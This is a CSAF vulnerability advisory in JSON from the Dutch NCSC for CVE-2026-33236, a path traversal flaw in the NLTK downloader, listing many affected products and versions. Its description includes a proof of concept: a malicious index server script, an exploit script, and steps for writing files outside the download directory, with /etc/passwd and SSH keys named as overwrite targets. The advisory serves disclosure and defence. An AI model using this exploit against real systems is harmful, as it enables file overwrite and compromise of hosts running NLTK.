{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33236", "tracking": { "current_release_date": "2026-03-29T16:14:29.210600Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33236", "initial_release_date": "2026-03-19T15:31:30.175913Z", "revision_history": [ { "date": "2026-03-19T15:31:30.175913Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-19T15:31:33.846323Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-20T23:25:58.447521Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T23:26:12.947061Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-20T23:38:59.098553Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T23:39:01.841653Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-21T12:44:16.392870Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (2)." }, { "date": "2026-03-21T12:44:18.910018Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-21T15:23:05.981571Z", "number": "9", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-21T15:23:09.489788Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-23T12:30:30.392708Z", "number": "11", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (29).| Product Identifiers created (4).| Product Remediations created (29).| References created (4).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-03-23T12:30:45.834359Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-24T07:48:15.462746Z", "number": "13", "summary": "Unknown change." }, { "date": "2026-03-24T13:49:40.693880Z", "number": "14", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-24T13:49:44.383400Z", "number": "15", "summary": "NCSC Score updated." }, { "date": "2026-03-25T18:42:03.444584Z", "number": "16", "summary": "References created (2)." }, { "date": "2026-03-25T18:42:07.180739Z", "number": "17", "summary": "NCSC Score updated." }, { "date": "2026-03-26T00:37:20.885929Z", "number": "18", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (64).| Product Identifiers created (63).| References created (3).| CWES updated (1)." }, { "date": "2026-03-27T12:06:50.355299Z", "number": "19", "summary": "Source connected.| CVE status created. (valid)| Products connected (1).| References created (4)." }, { "date": "2026-03-27T12:06:58.081774Z", "number": "20", "summary": "NCSC Score updated." }, { "date": "2026-03-29T03:16:20.488055Z", "number": "21", "summary": "References removed (2)." }, { "date": "2026-03-29T16:14:27.357983Z", "number": "22", "summary": "References created (2)." } ], "status": "interim", "version": "22" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<11.6.0", "product": { "name": "vers:unknown/<11.6.0", "product_id": "CSAFPID-1189281" } } ], "category": "product_name", "name": "App Connect Enterprise" } ], "category": "vendor", "name": "IBM" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5474797", "product_identification_helper": { "cpe": "cpe:/a:redhat:lightspeed_core" } } } ], "category": "product_name", "name": "Lightspeed Core" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2524222", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_lightspeed" } } } ], "category": "product_name", "name": "OpenShift Lightspeed" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-1508257", "product_identification_helper": { "cpe": "cpe:/a:redhat:ansible_automation_platform:2" } } } ], "category": "product_name", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1439279", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_ai" } } } ], "category": "product_name", "name": "Red Hat OpenShift AI (RHOAI)" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2920384" } } ], "category": "product_name", "name": "aap-cloud-metrics-collector-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1508263" } } ], "category": "product_name", "name": "ansible-dev-tools-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5008757" } } ], "category": "product_name", "name": "ansible-dev-tools-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-3054652" } } ], "category": "product_name", "name": "ansible-devspaces-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2831632" } } ], "category": "product_name", "name": "de-minimal-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2831633" } } ], "category": "product_name", "name": "de-minimal-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1508259" } } ], "category": "product_name", "name": "de-supported-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-4675946" } } ], "category": "product_name", "name": "de-supported-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2783920" } } ], "category": "product_name", "name": "ee-cloud-services-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-3095614" } } ], "category": "product_name", "name": "ee-minimal-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2698058" } } ], "category": "product_name", "name": "ee-minimal-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2698059" } } ], "category": "product_name", "name": "ee-supported-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2518221" } } ], "category": "product_name", "name": "ee-supported-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2831634" } } ], "category": "product_name", "name": "lightspeed-chatbot-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5035448" } } ], "category": "product_name", "name": "lightspeed-chatbot-rhel9" } ], "category": "product_family", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222641" } } ], "category": "product_name", "name": "lightspeed-ocp-rag-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2960939" } } ], "category": "product_name", "name": "lightspeed-rag-tool-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1508255" } } ], "category": "product_name", "name": "lightspeed-service-api-rhel9" } ], "category": "product_family", "name": "OpenShift Lightspeed" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5474798" } } ], "category": "product_name", "name": "lightspeed-stack-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5826731" } } ], "category": "product_name", "name": "rag-tool-rhel9" } ], "category": "product_family", "name": "Lightspeed Core" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-3112099" } } ], "category": "product_name", "name": "odh-llama-stack-core-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222767" } } ], "category": "product_name", "name": "odh-pipeline-runtime-pytorch-llmcompressor-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5276226" } } ], "category": "product_name", "name": "odh-ta-lmes-job-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5834017" } } ], "category": "product_name", "name": "odh-trustyai-nemo-guardrails-server-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222780" } } ], "category": "product_name", "name": "odh-workbench-jupyter-pytorch-llmcompressor-cuda-py312-rhel9" } ], "category": "product_family", "name": "Red Hat OpenShift AI (RHOAI)" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-1409483" } } ], "category": "product_name", "name": "nltk" } ], "category": "product_family", "name": "bookworm" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-1409484" } } ], "category": "product_name", "name": "nltk" } ], "category": "product_family", "name": "bullseye" } ], "category": "vendor", "name": "Debian" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/0.8", "product": { "name": "vers:unknown/0.8", "product_id": "CSAFPID-3249744", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.8" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9", "product": { "name": "vers:unknown/0.9", "product_id": "CSAFPID-3249745", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.3", "product": { "name": "vers:unknown/0.9.3", "product_id": "CSAFPID-3249746", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.3" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.4", "product": { "name": "vers:unknown/0.9.4", "product_id": "CSAFPID-3249747", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.4" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.5", "product": { "name": "vers:unknown/0.9.5", "product_id": "CSAFPID-3249748", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.5" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.6", "product": { "name": "vers:unknown/0.9.6", "product_id": "CSAFPID-3249749", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.6" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.7", "product": { "name": "vers:unknown/0.9.7", "product_id": "CSAFPID-3249750", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.7" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.8", "product": { "name": "vers:unknown/0.9.8", "product_id": "CSAFPID-3249751", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.8" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.9", "product": { "name": "vers:unknown/0.9.9", "product_id": "CSAFPID-3249752", "product_identification_helper": { "purl": "pkg:pypi/nltk@0.9.9" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.1", "product": { "name": "vers:unknown/2.0.1", "product_id": "CSAFPID-477849", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.1" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.1rc1", "product": { "name": "vers:unknown/2.0.1rc1", "product_id": "CSAFPID-3249753", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.1rc1" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.1rc2-git", "product": { "name": "vers:unknown/2.0.1rc2-git", "product_id": "CSAFPID-3249754", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.1rc2-git" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.1rc3", "product": { "name": "vers:unknown/2.0.1rc3", "product_id": "CSAFPID-3249755", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.1rc3" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.1rc4", "product": { "name": "vers:unknown/2.0.1rc4", "product_id": "CSAFPID-3249756", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.1rc4" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.2", "product": { "name": "vers:unknown/2.0.2", "product_id": "CSAFPID-3249757", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.2" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.3", "product": { "name": "vers:unknown/2.0.3", "product_id": "CSAFPID-477857", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.3" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.4", "product": { "name": "vers:unknown/2.0.4", "product_id": "CSAFPID-477865", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.4" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.5", "product": { "name": "vers:unknown/2.0.5", "product_id": "CSAFPID-3249758", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0.5" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0b4", "product": { "name": "vers:unknown/2.0b4", "product_id": "CSAFPID-3249759", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0b4" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0b5", "product": { "name": "vers:unknown/2.0b5", "product_id": "CSAFPID-3249760", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0b5" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0b6", "product": { "name": "vers:unknown/2.0b6", "product_id": "CSAFPID-3249761", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0b6" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0b7", "product": { "name": "vers:unknown/2.0b7", "product_id": "CSAFPID-3249762", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0b7" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0b8", "product": { "name": "vers:unknown/2.0b8", "product_id": "CSAFPID-3249763", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0b8" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0b9", "product": { "name": "vers:unknown/2.0b9", "product_id": "CSAFPID-3249764", "product_identification_helper": { "purl": "pkg:pypi/nltk@2.0b9" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.0", "product": { "name": "vers:unknown/3.0.0", "product_id": "CSAFPID-477852", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.0" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.0b1", "product": { "name": "vers:unknown/3.0.0b1", "product_id": "CSAFPID-3249765", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.0b1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.0b2", "product": { "name": "vers:unknown/3.0.0b2", "product_id": "CSAFPID-3249766", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.0b2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.1", "product": { "name": "vers:unknown/3.0.1", "product_id": "CSAFPID-477846", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.2", "product": { "name": "vers:unknown/3.0.2", "product_id": "CSAFPID-477861", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.3", "product": { "name": "vers:unknown/3.0.3", "product_id": "CSAFPID-477847", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.4", "product": { "name": "vers:unknown/3.0.4", "product_id": "CSAFPID-477853", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.4" } } }, { "category": "product_version_range", "name": "vers:unknown/3.0.5", "product": { "name": "vers:unknown/3.0.5", "product_id": "CSAFPID-477864", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.0.5" } } }, { "category": "product_version_range", "name": "vers:unknown/3.1", "product": { "name": "vers:unknown/3.1", "product_id": "CSAFPID-477854", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2", "product": { "name": "vers:unknown/3.2", "product_id": "CSAFPID-477859", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2.1", "product": { "name": "vers:unknown/3.2.1", "product_id": "CSAFPID-477850", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.2.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2.2", "product": { "name": "vers:unknown/3.2.2", "product_id": "CSAFPID-477862", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.2.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2.3", "product": { "name": "vers:unknown/3.2.3", "product_id": "CSAFPID-477855", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.2.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2.4", "product": { "name": "vers:unknown/3.2.4", "product_id": "CSAFPID-477858", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.2.4" } } }, { "category": "product_version_range", "name": "vers:unknown/3.2.5", "product": { "name": "vers:unknown/3.2.5", "product_id": "CSAFPID-477856", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.2.5" } } }, { "category": "product_version_range", "name": "vers:unknown/3.3", "product": { "name": "vers:unknown/3.3", "product_id": "CSAFPID-477848", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4", "product": { "name": "vers:unknown/3.4", "product_id": "CSAFPID-477860", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.4" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.1", "product": { "name": "vers:unknown/3.4.1", "product_id": "CSAFPID-477866", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.4.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.2", "product": { "name": "vers:unknown/3.4.2", "product_id": "CSAFPID-3249767", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.4.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.3", "product": { "name": "vers:unknown/3.4.3", "product_id": "CSAFPID-477863", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.4.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.4", "product": { "name": "vers:unknown/3.4.4", "product_id": "CSAFPID-477851", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.4.4" } } }, { "category": "product_version_range", "name": "vers:unknown/3.4.5", "product": { "name": "vers:unknown/3.4.5", "product_id": "CSAFPID-710861", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.4.5" } } }, { "category": "product_version_range", "name": "vers:unknown/3.5", "product": { "name": "vers:unknown/3.5", "product_id": "CSAFPID-710860", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.5" } } }, { "category": "product_version_range", "name": "vers:unknown/3.5b1", "product": { "name": "vers:unknown/3.5b1", "product_id": "CSAFPID-3249768", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.5b1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6", "product": { "name": "vers:unknown/3.6", "product_id": "CSAFPID-710863", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.1", "product": { "name": "vers:unknown/3.6.1", "product_id": "CSAFPID-710862", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.2", "product": { "name": "vers:unknown/3.6.2", "product_id": "CSAFPID-710864", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.3", "product": { "name": "vers:unknown/3.6.3", "product_id": "CSAFPID-710859", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.3" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.4", "product": { "name": "vers:unknown/3.6.4", "product_id": "CSAFPID-712017", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.4" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.5", "product": { "name": "vers:unknown/3.6.5", "product_id": "CSAFPID-712018", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.5" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.6", "product": { "name": "vers:unknown/3.6.6", "product_id": "CSAFPID-3249769", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.6" } } }, { "category": "product_version_range", "name": "vers:unknown/3.6.7", "product": { "name": "vers:unknown/3.6.7", "product_id": "CSAFPID-3249770", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.6.7" } } }, { "category": "product_version_range", "name": "vers:unknown/3.7", "product": { "name": "vers:unknown/3.7", "product_id": "CSAFPID-3249771", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.7" } } }, { "category": "product_version_range", "name": "vers:unknown/3.8", "product": { "name": "vers:unknown/3.8", "product_id": "CSAFPID-3249772", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.8" } } }, { "category": "product_version_range", "name": "vers:unknown/3.8.1", "product": { "name": "vers:unknown/3.8.1", "product_id": "CSAFPID-337467", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.8.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.9", "product": { "name": "vers:unknown/3.9", "product_id": "CSAFPID-5667818", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.9" } } }, { "category": "product_version_range", "name": "vers:unknown/3.9.1", "product": { "name": "vers:unknown/3.9.1", "product_id": "CSAFPID-5667819", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.9.1" } } }, { "category": "product_version_range", "name": "vers:unknown/3.9.2", "product": { "name": "vers:unknown/3.9.2", "product_id": "CSAFPID-5667820", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.9.2" } } }, { "category": "product_version_range", "name": "vers:unknown/3.9b1", "product": { "name": "vers:unknown/3.9b1", "product_id": "CSAFPID-3249773", "product_identification_helper": { "purl": "pkg:pypi/nltk@3.9b1" } } }, { "category": "product_version_range", "name": "vers:unknown/<=3.9.3", "product": { "name": "vers:unknown/<=3.9.3", "product_id": "CSAFPID-5878160", "product_identification_helper": { "cpe": "cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<=3.9.2", "product": { "name": "vers:unknown/>=0|<=3.9.2", "product_id": "CSAFPID-5667821" } } ], "category": "product_name", "name": "nltk" } ], "category": "vendor", "name": "nltk" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33236", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')" }, "notes": [ { "category": "description", "text": "## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n ↓\n2. Provides malicious XML: \n ↓\n3. Victim executes: downloader.download('passwd')\n ↓\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n ↓\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n ↓\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n ↓\n7. open(filepath, \"wb\") writes file to /etc/passwd.zip\n ↓\n8. System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"\n\n \n \n \n\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/malicious_index.xml':\n self.send_response(200)\n self.send_header('Content-type', 'application/xml')\n self.end_headers()\n with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:\n self.wfile.write(f.read())\n elif self.path == '/test.zip':\n self.send_response(200)\n self.send_header('Content-type', 'application/zip')\n self.end_headers()\n with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:\n self.wfile.write(f.read())\n else:\n self.send_response(404)\n self.end_headers()\n \n def log_message(self, format, *args):\n pass\n\n# Start server\nif __name__ == \"__main__\":\n port = 8888\n server = HTTPServer((\"0.0.0.0\", port), Handler)\n print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n print(\"Press Ctrl+C to stop\")\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n print(f\"Download directory: {download_dir}\")\n \n # Exploit vulnerability\n from nltk.downloader import Downloader\n downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n downloader.download(\"test_file\", quiet=True)\n \n # Check results\n expected_path = \"/tmp/test_file.zip\"\n if os.path.exists(expected_path):\n print(f\"\\n✗ Exploit successful! File written to: {expected_path}\")\n print(f\"✗ Path traversal attack successful!\")\n else:\n print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n exploit()\n```\n\n### Execution 